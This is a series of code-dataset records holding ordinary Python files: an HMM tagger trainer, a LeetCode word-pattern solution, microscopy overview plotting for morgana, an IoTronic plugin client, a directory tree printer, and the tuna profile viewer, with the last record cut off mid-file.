this lets our model decide the rate at which new\n # words of each POS-type should be expected (e.g., high for nouns,\n # low for determiners).\n\n if tag not in emissions:\n emissions[tag] = defaultdict(lambda: 0)\n if prevtag not in transitions:\n transitions[prevtag] = defaultdict(lambda: 0)\n\n if token not in vocab:\n vocab[token] = 1\n emissions[tag][OOV_WORD] += 1\n # increment the emission/transition observation\n emissions[tag][token] += 1\n emissions_total[tag] += 1\n\n transitions[prevtag][tag] += 1\n transitions_total[prevtag] += 1\n\n prevtag = tag\n\n # don't forget the stop probability for each sentence\n if prevtag not in transitions:\n transitions[prevtag] = defaultdict(lambda: 0)\n\n transitions[prevtag][FINAL_STATE] += 1\n transitions_total[prevtag] += 1\n\n# Write output to output_file\nwith open(OUTPUT_FILE, \"w\") as f:\n for prevtag in transitions:\n for tag in transitions[prevtag]:\n f.write(\"trans {} {} {}\\n\"\n .format(prevtag, tag, transitions[prevtag][tag] / transitions_total[prevtag]))\n\n for tag in emissions:\n for token in emissions[tag]:\n f.write(\"emit {} {} {}\\n\"\n .format(tag, token, emissions[tag][token] / emissions_total[tag]))\n\n\n\n","sub_path":"train_hmm.py","file_name":"train_hmm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296584138","text":"\"\"\"\nProblem: Given a pattern and a string str, find if str follows the same pattern.\n Here follow means a full match, such that there is a bijection between a letter in pattern\n and a non-empty word in str.\n Example 1: Input: pattern = \"abba\", str = \"dog cat cat dog\" Output: true\n Example 2: Input:pattern = \"abba\", str = \"dog cat cat fish\" Output: false\n Example 3: Input: pattern = \"aaaa\", str = \"dog cat cat dog\" Output: false\n Example 4: Input: pattern = \"abba\", str = \"dog dog dog dog\" Output: false\n Notes: You may assume pattern contains only lowercase letters,\n and str contains lowercase letters that may be separated by a single space.\nLeetcode: https://leetcode.com/problems/word-pattern/\nTime Complexity: O(n), n is the length of given string\nSpace Complexity: O(n) to store hashmap and string\nLeetcode: Pass\nAny problems: No\n\"\"\"\n\n\nclass Solution:\n def wordPattern(self, pattern, s):\n # Define two hashmaps for two given strings\n smap = {}\n tmap = {}\n\n arr = s.split()\n if len(pattern) != len(arr):\n return False\n\n for i in range(len(pattern)):\n a = pattern[i]\n b = arr[i]\n\n if a not in smap.keys():\n smap[a] = b\n else:\n if smap[a] != b:\n return False\n if b not in tmap.keys():\n tmap[b] = a\n else:\n if tmap[b] != a:\n return False\n return True\n\n\nobj = Solution()\nprint(obj.wordPattern(\"abba\", \"dog cat cat dog\"))\nprint(obj.wordPattern(\"abba\", \"dog cat cat ship\"))","sub_path":"word_pattern.py","file_name":"word_pattern.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614602011","text":"import numpy as np\nimport os, tqdm\nfrom skimage.io import imread, imsave\nfrom skimage import img_as_bool\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom textwrap import wrap\nfrom matplotlib import rc\nrc('font', size=17)\nrc('font', family='Arial')\n# rc('font', serif='Times')\nrc('pdf', fonttype=42)\n# rc('text', usetex=True)\nfrom itertools import repeat\nimport 
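# The OOV trick described in train_hmm.py above, in miniature: the first
# observation of ANY token also counts once as an OOV emission for its tag, so
# open classes that keep introducing new words (nouns) end up with a larger OOV
# rate than closed classes (determiners):
from collections import defaultdict

emissions = defaultdict(lambda: defaultdict(int))
vocab = {}
for tag, token in [('N', 'dog'), ('N', 'cat'), ('D', 'the'), ('D', 'the')]:
    if token not in vocab:
        vocab[token] = 1
        emissions[tag]['OOV'] += 1
    emissions[tag][token] += 1
print(emissions['N']['OOV'], emissions['D']['OOV'])  # 2 1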
multiprocessing\n\nfrom morgana.DatasetTools import io\nfrom morgana.DatasetTools.morphology import computemorphology\nfrom morgana.DatasetTools.morphology import io as ioMorph\nfrom morgana.ImageTools import compositeImageJ\nfrom morgana.ImageTools.morphology import meshgrid\n\n#########################################################################################################################\n\ndef generate_overview_finalMask(input_folder, chosen, saveFig=True, downshape=1, autoclose=False):\n print('### Generating recap image at',input_folder)\n\n flist_in = io.get_image_list(input_folder)\n flist_in = [flist_in[i] for i in range(len(flist_in)) if chosen[i]]\n segment_folder = os.path.join(input_folder,'result_segmentation')\n flist_ma = io.get_image_list(segment_folder, '_finalMask.tif', 'include')\n \n n_img = len(flist_in)\n ncols = 5\n nrows = (n_img-1)//5+1\n\n fig,ax = plt.subplots(figsize=(3*ncols,3*nrows), nrows=nrows, ncols=ncols)\n ax = ax.flatten()\n\n # ### multiprocess\n # file_names = [[flist_in[i],flist_ma[i]] for i in range(n_img)]\n # N_cores = np.clip( int(0.8 * multiprocessing.cpu_count()),1,None )\n\n # pool = multiprocessing.Pool(N_cores)\n # data_list = list( tqdm.tqdm(\n # pool.istarmap(\n # ImageTools.io.load_images_ch0, \n # zip( flist_in, \n # flist_ma,\n # repeat( downshape ) ) ), \n # total = n_img ) )\n # imgs = [data[0] for data in data_list]\n # masks = [data[1] for data in data_list]\n\n ### normal for loop\n imgs = [0. for i in range(n_img)] \n masks = [0. for i in range(n_img)]\n for i in tqdm.tqdm(range(n_img)): \n img = imread(flist_in[i]).astype(float)\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n imgs[i] = img[0,::downshape,::downshape]\n masks[i] = imread(flist_ma[i])[::downshape,::downshape].astype(float)\n\n ### plotting\n for i in tqdm.tqdm(range(n_img)):\n \n _, filename = os.path.split(flist_in[i])\n filename, _ = os.path.splitext(filename)\n \n ax[i].imshow(imgs[i], 'gray', interpolation='none', vmin=np.percentile(img,1.), vmax=np.percentile(img,99.))\n cmap = mpl.colors.LinearSegmentedColormap.from_list('my_cmap',['black','aqua'],256)\n ax[i].imshow(masks[i], cmap=cmap, interpolation='none',alpha=.3)\n\n ax[i].set_title((\"\\n\".join(wrap(filename, 20))),fontsize=6)\n \n for a in ax:\n a.axis('off')\n for j in range(i+1,len(ax)):\n ax[j].remove()\n \n # plt.show()\n \n if autoclose:\n plt.pause(10)\n plt.close()\n \n\n if saveFig:\n print('### Saving image...')\n # save figure\n _, cond = os.path.split(input_folder)\n fig.savefig(os.path.join(input_folder, 'result_segmentation', cond+'_finalMasks.png'), dpi=300)\n print('### Done saving!')\n\n return fig\n\n#########################################################################################################################\n\ndef generate_composite_movie_cropped(input_folder):\n print('### Generating recap composite movie at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n \n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n # flist_mask = [ os.path.join(input_folder, i) for 
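# The three-line pattern repeated throughout overview.py above (expand 2-D
# images to 3-D, move a trailing channel axis to the front) factored into one
# helper; a sketch using the same heuristic, that the smallest axis is channels:
import numpy as np

def channels_first(img):
    if img.ndim == 2:
        img = np.expand_dims(img, 0)
    if img.shape[-1] == min(img.shape):
        img = np.moveaxis(img, -1, 0)
    return img

print(channels_first(np.zeros((512, 512, 3))).shape)  # (3, 512, 512)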
i in props['mask_file'] ]\n \n n_imgs = len(flist_in)\n\n dims = np.zeros((n_imgs,2))\n for i in range(n_imgs):\n _slice = np.array(props['slice'][i])\n dims[i][0] = _slice[0].stop-_slice[0].start\n dims[i][1] = _slice[1].stop-_slice[1].start\n \n max_dim = np.max(dims,0).astype(np.uint16)\n # make sure max_dim is even!\n for i in range(len(max_dim)):\n if np.mod(max_dim[i],2)!=0:\n max_dim[i] += 1\n \n img = imread(flist_in[0])\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n n_ch = img.shape[0]\n movie = np.zeros((n_imgs,1,n_ch,max_dim[0],max_dim[1]))\n \n for i in tqdm.tqdm(range(n_imgs)):\n imgs = imread(flist_in[i])\n if len(imgs.shape) == 2:\n imgs = np.expand_dims(imgs,0)\n if imgs.shape[-1] == np.min(imgs.shape):\n imgs = np.moveaxis(imgs, -1, 0)\n _slice = props['slice'][i]\n center = [int((_slice[0].stop+_slice[0].start)/2),\n int((_slice[1].stop+_slice[1].start)/2)]\n\n _slice_large = [slice(int((center[0]-max_dim[0]/2)),int((center[0]+max_dim[0]/2)),None),\n slice(int((center[1]-max_dim[1]/2)),int((center[1]+max_dim[1]/2)),None)]\n\n # pad the image if the largest mask doesn't fit\n if int((center[0]-max_dim[0]/2))<0:\n w = np.abs(int((center[0]-max_dim[0]/2)))\n imgs = np.stack([np.pad(a,((w,0),(0,0)),mode='constant') for a in imgs])\n center[0] = center[0] + w\n if int((center[1]-max_dim[1]/2))<0:\n w = np.abs(int((center[1]-max_dim[1]/2)))\n imgs = np.stack([np.pad(a,((0,0),(w,0)),mode='constant') for a in imgs])\n center[1] = center[1] + w\n if int((center[0]+max_dim[0]/2))>imgs[0].shape[0]:\n w = np.abs(int((center[0]+max_dim[0]/2-imgs[0].shape[0])))\n imgs = np.stack([np.pad(a,((0,w+10),(0,0)),mode='constant') for a in imgs])\n if int((center[1]+max_dim[1]/2))>imgs[0].shape[1]:\n w = np.abs(int((center[1]+max_dim[1]/2-imgs[0].shape[1])))\n imgs = np.stack([np.pad(a,((0,0),(0,w+10)),mode='constant') for a in imgs])\n\n _slice_large = [slice(int((center[0]-max_dim[0]/2)),int((center[0]+max_dim[0]/2)),None),\n slice(int((center[1]-max_dim[1]/2)),int((center[1]+max_dim[1]/2)),None)]\n\n\n img = np.stack([ a[_slice_large] for a in imgs ])\n \n movie[i,0,...] 
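# The np.pad calls above guard a fixed-size crop centred on the mask: whenever
# the window sticks out of the image, the image is zero-padded first. A compact
# sketch of the same idea for a single 2-D image:
import numpy as np

def crop_centered(img, center, size):
    half = size // 2
    pad_top = max(0, half - center[0])
    pad_left = max(0, half - center[1])
    pad_bottom = max(0, center[0] + half - img.shape[0])
    pad_right = max(0, center[1] + half - img.shape[1])
    img = np.pad(img, ((pad_top, pad_bottom), (pad_left, pad_right)), mode='constant')
    r, c = center[0] + pad_top, center[1] + pad_left
    return img[r - half:r + half, c - half:c + half]

print(crop_centered(np.ones((50, 60)), (5, 58), 20).shape)  # (20, 20)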
= img\n\n \n grays = np.tile(np.arange(256, dtype='uint8'), (3, 1))\n green = np.zeros((3, 256), dtype='uint8')\n green[1] = np.arange(256, dtype='uint8')\n # red = np.zeros((3, 256), dtype='uint8')\n # red[0] = np.arange(256, dtype='uint8')\n ijtags = compositeImageJ.imagej_metadata_tags({'LUTs': [grays, green]}, '>')\n imsave(os.path.join(segment_folder,cond+'_composite_recap.tif'),movie.astype(np.uint16), byteorder='>', imagej=True,\n metadata={'mode': 'composite'}, extratags=ijtags)\n \ndef generate_composite_img_cropped(input_folder, downshape=1, keep_open=True):\n print('### Generating recap composite image at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n\n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n # flist_mask = [ os.path.join(input_folder, i) for i in props['mask_file'] ]\n \n n_img = len(flist_in)\n img = imread(flist_in[0])\n if len(img.shape) == 2:\n img = np.expand_dims(img,0)\n if img.shape[-1] == np.min(img.shape):\n img = np.moveaxis(img, -1, 0)\n n_col = img.shape[0]+1\n\n fig,ax = plt.subplots(figsize=(n_col,n_img), nrows=n_img, ncols=n_col)\n plt.subplots_adjust(top=0.99,left=0.01,right=0.99,bottom=0.01)\n # ax = ax.flatten()\n # print(n_img,len(ax))\n\n for i in tqdm.tqdm(range(n_img)):\n imgs = imread(flist_in[i])\n if len(imgs.shape) == 2:\n imgs = np.expand_dims(imgs,0)\n if imgs.shape[-1] == np.min(imgs.shape):\n imgs = np.moveaxis(imgs, -1, 0)\n _slice = props['slice'][i]\n imgs = np.stack([ a[_slice][::downshape,::downshape] for a in imgs ])\n\n cmaps = [\n mpl.colors.LinearSegmentedColormap.from_list('my_cmap',['black',i],256) for i in ['white','lime','red','aqua','magenta','green','yellow','blue']\n ]\n alphas = [.5]*10\n alphas[0] = 1.\n\n for j in range(len(imgs)):\n ax[i,-1].imshow(imgs[j], cmap=cmaps[j], interpolation='none', vmin=np.percentile(imgs[j],1.), vmax=np.percentile(imgs[j],99.),alpha=alphas[j])\n ax[i,j].imshow(imgs[j], cmap=cmaps[j], interpolation='none', vmin=np.percentile(imgs[j],1.), vmax=np.percentile(imgs[j],99.),alpha=1)\n \n name = os.path.split(flist_in[i])[-1]\n ax[i,int(n_col/2)].set_title((\"\\n\".join(wrap(name, 40))),fontsize=6)\n \n for a in ax.flatten():\n a.axis('off')\n \n fig.show()\n\n print('### Saving image...')\n # save figure\n _, cond = os.path.split(input_folder)\n fig.savefig(os.path.join(segment_folder,cond+'_composite_recap.png'), dpi=300)\n if not keep_open:\n plt.close(fig)\n print('### Done saving!')\n\ndef createCompositeOverview(folder, keep_open=True, create_tif=True):\n if create_tif:\n generate_composite_movie_cropped(folder)\n generate_composite_img_cropped(folder, keep_open=keep_open)\n\n##########################################################################################################################\n\ndef generate_meshgrid_img_cropped(input_folder, keep_open = True):\n print('### Generating recap meshgrid image at',input_folder)\n _, cond = os.path.split(input_folder)\n segment_folder = os.path.join(input_folder,'result_segmentation')\n\n file_extension = '_morpho_params.json'\n fname = os.path.join(segment_folder,cond+file_extension)\n if not 
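# A hedged alternative for the composite export above: recent versions of
# tifffile can write an ImageJ composite directly, with the axes order TZCYX
# matching the movie array built in generate_composite_movie_cropped. This is
# illustrative only; the module itself goes through skimage.io.imsave with
# explicit LUT tags.
import numpy as np
import tifffile

movie = np.zeros((5, 1, 2, 64, 64), dtype=np.uint16)  # (T, Z, C, Y, X)
tifffile.imwrite('composite.tif', movie, imagej=True,
                 metadata={'axes': 'TZCYX', 'mode': 'composite'})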
os.path.exists(fname):\n props = computemorphology.compute_morphological_info(input_folder)\n ioMorph.save_morpho_params( segment_folder, cond, props )\n else:\n props = ioMorph.load_morpho_params(segment_folder, cond)\n\n flist_in = [ os.path.join(input_folder, i) for i in props['input_file'] ] \n flist_ma = [ os.path.join(input_folder, i) for i in props['mask_file'] ]\n \n n_img = len(flist_in)\n ncols = 5\n nrows = (n_img-1)//5+1\n\n fig,ax = plt.subplots(figsize=(3*ncols,3*nrows), nrows=nrows, ncols=ncols)\n plt.subplots_adjust(top=0.95,left=0.05,right=0.95,bottom=0.05,hspace=0.01,wspace=0.01)\n ax = ax.flatten()\n\n for i in tqdm.tqdm(range(n_img)):\n prop = {key: props[key][i] for key in props}\n\n tangent = prop['tangent']\n midline = prop['midline']\n width = prop['meshgrid_width']\n mesh = prop['meshgrid']\n if not mesh:\n mesh = meshgrid.compute_meshgrid(midline,tangent,width)\n anch = prop['anchor_points_midline']\n\n bf = imread(flist_in[i])\n if len(bf.shape) == 2:\n bf = np.expand_dims(bf,0)\n if bf.shape[-1] == np.min(bf.shape):\n bf = np.moveaxis(bf,-1,0)\n bf = bf[0][prop['slice']]\n ma = img_as_bool( imread(flist_ma[i])[prop['slice']].astype(np.float) )\n\n meshgrid.visualize_meshgrid(midline,tangent,mesh,bf,color='white', ax=ax[i])\n \n ax[i].contour(ma, [0.5], colors='r', alpha=.5)\n ax[i].plot(anch[:,1], anch[:,0], '-or', lw=.5, ms=.5, alpha=.5)\n\n name = os.path.split(flist_in[i])[-1]\n ax[i].set_title((\"\\n\".join(wrap(name, 20))),fontsize=6)\n\n for a in ax:\n a.axis('off')\n for j in range(i+1,len(ax)):\n ax[j].remove()\n\n fig.show()\n \n print('### Saving image...')\n # save figure\n fig.savefig(os.path.join(segment_folder, cond+'_meshgrid_recap.png'), dpi=300)\n if not keep_open:\n plt.close(fig)\n print('### Done saving!')\n\ndef createMeshgridOverview(input_folder, keep_open = True):\n generate_meshgrid_img_cropped(input_folder, keep_open=keep_open)\n\n##########################################################################################################################\n\n","sub_path":"morgana/DatasetTools/morphology/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":13049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17490594","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom iotronicclient.common import base\nfrom iotronicclient.common.i18n import _\nfrom iotronicclient.common import utils\nfrom iotronicclient import exc\n\nLOG = logging.getLogger(__name__)\n_DEFAULT_POLL_INTERVAL = 2\n\n\nclass Plugin(base.Resource):\n def __repr__(self):\n return \"\" % self._info\n\n\nclass PluginManager(base.CreateManager):\n resource_class = Plugin\n _creation_attributes = ['name', 'code', 'public', 'callable', 'parameters',\n 'extra']\n _resource_name = 'plugins'\n\n def list(self, marker=None, limit=None,\n detail=False, sort_key=None, sort_dir=None, fields=None,\n public=None,\n with_public=False, all_plugins=False):\n \"\"\"Retrieve a list of plugins.\n\n :param marker: Optional, the UUID of a plugin, eg the last\n plugin from a previous result set. Return\n the next result set.\n :param limit: The maximum number of results to return per\n request, if:\n\n 1) limit > 0, the maximum number of plugins to return.\n 2) limit == 0, return the entire list of plugins.\n 3) limit param is NOT specified (None), the number of items\n returned respect the maximum imposed by the Iotronic API\n (see Iotronic's api.max_limit option).\n\n :param detail: Optional, boolean whether to return detailed information\n about plugins.\n\n :param sort_key: Optional, field used for sorting.\n\n :param sort_dir: Optional, direction of sorting, either 'asc' (the\n default) or 'desc'.\n\n :param fields: Optional, a list with a specified set of fields\n of the resource to be returned. Can not be used\n when 'detail' is set.\n\n :param with_public: Optional boolean value to get also public plugins.\n\n :param all_plugins: Optional boolean value to get all plugins.\n\n :returns: A list of plugins.\n\n \"\"\"\n if limit is not None:\n limit = int(limit)\n\n if detail and fields:\n raise exc.InvalidAttribute(_(\"Can't fetch a subset of fields \"\n \"with 'detail' set\"))\n\n filters = utils.common_filters(marker, limit, sort_key, sort_dir,\n fields)\n path = ''\n if not public:\n if with_public:\n filters.append('with_public=true')\n if all_plugins:\n filters.append('all_plugins=true')\n\n if detail:\n path += 'detail'\n\n else:\n path += 'public'\n\n if filters:\n path += '?' 
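# The query-string assembly in PluginManager.list above, in isolation: filter
# fragments are joined onto the request path (a self-contained sketch with
# illustrative filter values):
filters = ['limit=50', 'sort_key=name', 'with_public=true']
path = 'detail'
if filters:
    path += '?' + '&'.join(filters)
print(path)  # detail?limit=50&sort_key=name&with_public=true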
+ '&'.join(filters)\n\n if limit is None:\n return self._list(self._path(path), \"plugins\")\n else:\n return self._list_pagination(self._path(path), \"plugins\",\n limit=limit)\n\n def get(self, plugin_id, fields=None):\n return self._get(resource_id=plugin_id, fields=fields)\n\n def delete(self, plugin_id):\n return self._delete(resource_id=plugin_id)\n\n def update(self, plugin_id, patch, http_method='PATCH'):\n return self._update(resource_id=plugin_id, patch=patch,\n method=http_method)\n","sub_path":"iotronicclient/v1/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541522433","text":"import os\r\nimport sys\r\nimport argparse\r\nfrom sys import argv\r\n\r\ncdir = os.getcwd()\r\nonlydirs = False\r\nfout = sys.stdout\r\ntotaldirs = 0\r\ntotalfiles = 0\r\n\r\ndef parseargs():\r\n global onlydirs\r\n global fout\r\n global cdir\r\n parser = argparse.ArgumentParser(description = \"Tree\", prog = \"tree\")\r\n parser.add_argument(\"-d\", dest = \"onlydirs\", help = \"List only dirs\", action = \"store_true\")\r\n parser.add_argument(\"-o\", dest = \"fout\", nargs = '?', type = argparse.FileType('w'), default = sys.stdout)\r\n parser.add_argument(\"cdir\", metavar = \"dir\", nargs = '?', default = os.getcwd())\r\n res = parser.parse_args()\r\n fout = res.fout\r\n onlydirs = res.onlydirs\r\n cdir = res.cdir\r\n \r\n \r\ndef scan(cd = \"\", level = 0, drawvl = True):\r\n global cdir\r\n global fout\r\n global onlydirs\r\n global totaldirs\r\n global totalfiles\r\n dirs = os.listdir(cdir + cd)\r\n vl1 = (drawvl and \"|\") or \" \"\r\n vl2 = \"|\"\r\n if onlydirs:\r\n dirs = [x for x in dirs if os.path.isdir(cdir + os.path.sep + x)]\r\n for x in dirs:\r\n dname = cdir + os.path.sep + x\r\n if x == dirs[len(dirs) - 1]:\r\n vl1 = (not drawvl and \" \") or \"|\"\r\n vl2 = \"`\"\r\n drawvl = not (level == 0)\r\n if os.path.isdir(dname):\r\n totaldirs += 1\r\n elif os.path.isfile(dname):\r\n totalfiles += 1\r\n fout.write((vl1 + \" \") * level + vl2 + \"-- \" + x)\r\n if os.path.islink(dname):\r\n fout.write(\" -> \" + os.readlink(dname))\r\n fout.write(\"\\n\")\r\n if os.path.isdir(dname):\r\n scan(os.path.sep + x, level + 1, drawvl)\r\n \r\n\r\nparseargs()\r\nfout.write(cdir + \"\\n\")\r\nscan()\r\nfout.write(\"Files: \" + str(totalfiles) + \", Direcotries: \" + str(totaldirs))\r\nfout.close()","sub_path":"practice_python/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3592597","text":"'''\nIneqPy\n\n\n'''\n\nfrom .ineqpy import *\n\n__author__ = \"Maximiliano Greco\"\n__version__ = \"0.0.2\"\n__maintainer__ = \"Maximiliano Greco\"\n__email__ = \"mmngreco@gmail.com\"\n__status__ = \"Production\"\n\nprint(\"IneqPy: A PYTHON PACKAGE TO QUANTITATIVE ANALYSIS OF INEQUALITY LODADED\")","sub_path":"ineqpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"608460973","text":"# -*- coding: utf-8 -*-\n#\nimport os\nimport pstats\nimport threading\nimport webbrowser\n\nimport tornado.ioloop\nimport tornado.web\n\nfrom .__about__ import __version__\nfrom .module_groups import built_in, built_in_deprecated\n\n\nclass TunaError(Exception):\n pass\n\n\ndef read(filename):\n _, ext = os.path.splitext(filename)\n try:\n 
return read_import_profile(filename)\n    except (TunaError, StopIteration):\n        pass\n\n    # runtime profile\n    return read_runtime_profile(filename)\n\n\ndef read_runtime_profile(prof_filename):\n    stats = pstats.Stats(prof_filename)\n\n    # One way of finding the root nodes would be to loop over\n    # stats.stats.items() and check which don't have parents. This, however, doesn't\n    # work if there are loops in the graph which happens, for example, if exec() is\n    # called somewhere in the program. For this reason, find all nodes without parents\n    # and simply hardcode ``.\n    roots = []\n    for item in stats.stats.items():\n        key, value = item\n        if value[4] == {}:\n            roots.append(key)\n    default_root = (\"~\", 0, \"\")\n    if default_root in stats.stats:\n        roots += [default_root]\n\n    # Collect children\n    children = {key: [] for key in stats.stats.keys()}\n    for key, value in stats.stats.items():\n        _, _, _, _, parents = value\n        for parent in parents:\n            children[parent].append(key)\n\n    def populate(key, parent):\n        if parent is None:\n            _, _, selftime, cumtime, parent_times = stats.stats[key]\n            parent_times = []\n        else:\n            _, _, _, _, parent_times = stats.stats[key]\n            _, _, selftime, cumtime = parent_times[parent]\n\n        # Convert the tuple key into a string\n        name = \"{}::{}::{}\".format(*key)\n        if len(parent_times) <= 1:\n            # Handle children\n            # merge dictionaries\n            c = [populate(child, key) for child in children[key]]\n            c.append({\"name\": name + \"::self\", \"color\": 0, \"value\": selftime})\n            out = {\"name\": name, \"color\": 0, \"children\": c}\n        else:\n            out = {\"name\": name, \"color\": 0, \"value\": cumtime}\n        return out\n\n    data = {\n        \"name\": \"root\",\n        \"color\": 0,\n        \"children\": [populate(root, None) for root in roots],\n    }\n    return data\n\n\ndef read_import_profile(filename):\n    # The import profile is of the form\n    # ```\n    # import time: self [us] | cumulative | imported package\n    # import time: 378 | 378 | zipimport\n    # import time: 1807 | 1807 | _frozen_importlib_external\n    # import time: 241 | 241 | _codecs\n    # import time: 6743 | 6984 | codecs\n    # import time: 1601 | 1601 | encodings.aliases\n    # import time: 11988 | 20571 | encodings\n    # import time: 700 | 700 | encodings.utf_8\n    # import time: 535 | 535 | _signal\n    # import time: 1159 | 1159 | encodings.latin_1\n    # [...]\n    # ```\n    # The indentation in the last column signals parent-child relationships.
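# For reference, each value in the pstats.Stats(...).stats mapping that
# read_runtime_profile above unpacks is a 5-tuple
# (call_count, primitive_call_count, total_time, cumulative_time, callers).
# A quick way to inspect one entry:
import cProfile
import pstats

cProfile.run('sum(range(1000))', 'demo.prof')
stats = pstats.Stats('demo.prof')
key, value = next(iter(stats.stats.items()))
print(key)        # (filename, line_number, function_name)
print(value[:4])  # cc, nc, tt, ct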
In the\n # above example, `encodings` is parent to `encodings.aliases` and `codecs` which in\n # turn is parent to `_codecs`.\n entries = []\n with open(filename, \"r\") as f:\n # filtered iterator over lines prefixed with \"import time: \"\n import_lines = (\n line[len(\"import time: \") :].rstrip()\n for line in f\n if line.startswith(\"import time: \")\n )\n\n try:\n line = next(import_lines)\n except UnicodeError:\n raise TunaError()\n\n assert line == \"self [us] | cumulative | imported package\"\n\n for line in import_lines:\n items = line.split(\" | \")\n assert len(items) == 3\n self_time = int(items[0])\n last = items[2]\n name = last.lstrip()\n num_leading_spaces = len(last) - len(name)\n assert num_leading_spaces % 2 == 0\n level = num_leading_spaces // 2\n entries.append((name, level, self_time))\n\n def shelf(lst, k):\n reference_level = lst[k][1]\n out = []\n while k < len(lst):\n name, level, self_time = lst[k]\n if level == reference_level:\n module = name.split(\".\")[0]\n if module in built_in:\n color = 1\n elif module in built_in_deprecated:\n color = 2\n else:\n color = 0\n out.append({\"name\": name, \"value\": self_time * 1.0e-6, \"color\": color})\n k += 1\n elif level < reference_level:\n return out, k\n else:\n assert level == reference_level + 1\n out[-1][\"children\"], k = shelf(lst, k)\n return out, k\n\n lst, k = shelf(entries[::-1], 0)\n assert k == len(entries)\n\n return {\"name\": \"main\", \"color\": 0, \"children\": lst}\n\n\ndef start_server(prof_filename, start_browser):\n data = read(prof_filename)\n this_dir = os.path.dirname(__file__)\n data = data\n\n class IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\n os.path.join(this_dir, \"web\", \"index.html\"),\n data=tornado.escape.json_encode(data),\n version=__version__,\n )\n return\n\n app = tornado.web.Application(\n [(r\"/\", IndexHandler)], static_path=os.path.join(this_dir, \"web\", \"static\")\n )\n\n port = None\n for prt in range(8000, 8100):\n try:\n app.listen(prt)\n except OSError:\n pass\n else:\n port = prt\n break\n assert port is not None, \"Could not find open port.\"\n\n address = \"http://localhost:{}\".format(port)\n print(\"Started tuna server at {}\".format(address))\n\n if start_browser:\n threading.Thread(target=lambda: webbrowser.open_new_tab(address)).start()\n\n try:\n tornado.ioloop.IOLoop.instance().start()\n except KeyboardInterrupt:\n tornado.ioloop.IOLoop.instance().stop()\n print(\"\\nBye!\")\n return\n","sub_path":"tuna/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255694625","text":"from math import sin, cos, pi\nimport numpy as np\nfrom numpy import uint8\n\ndef rotate(l, n):\n '''rotate list l by n'''\n return l[n:] + l[:n]\n\nclass ColorWheel(object):\n ''' A convenience function for creating/parametrizing colors '''\n def __init__(self, size = 256, red = True, green = True, blue = True):\n self.size = size\n self.dt = 2*pi / size\n self.R, self.G, self.B = red, green, blue\n\n colors = sum([red, green, blue]) # How many colors do we have?\n spread = size // 2 # Spread to side from peak\n if colors:\n spread = size // (colors)\n else:\n raise Exception(\"Color wheel with no colors is dumb. 
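# A log in exactly the shape parsed above comes from CPython's -X importtime
# option (Python 3.7+), which writes to stderr; capturing one programmatically:
import subprocess
import sys

log = subprocess.run(
    [sys.executable, '-X', 'importtime', '-c', 'import json'],
    capture_output=True, text=True,
).stderr
print(log.splitlines()[0])  # "import time: self [us] | cumulative | imported package"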
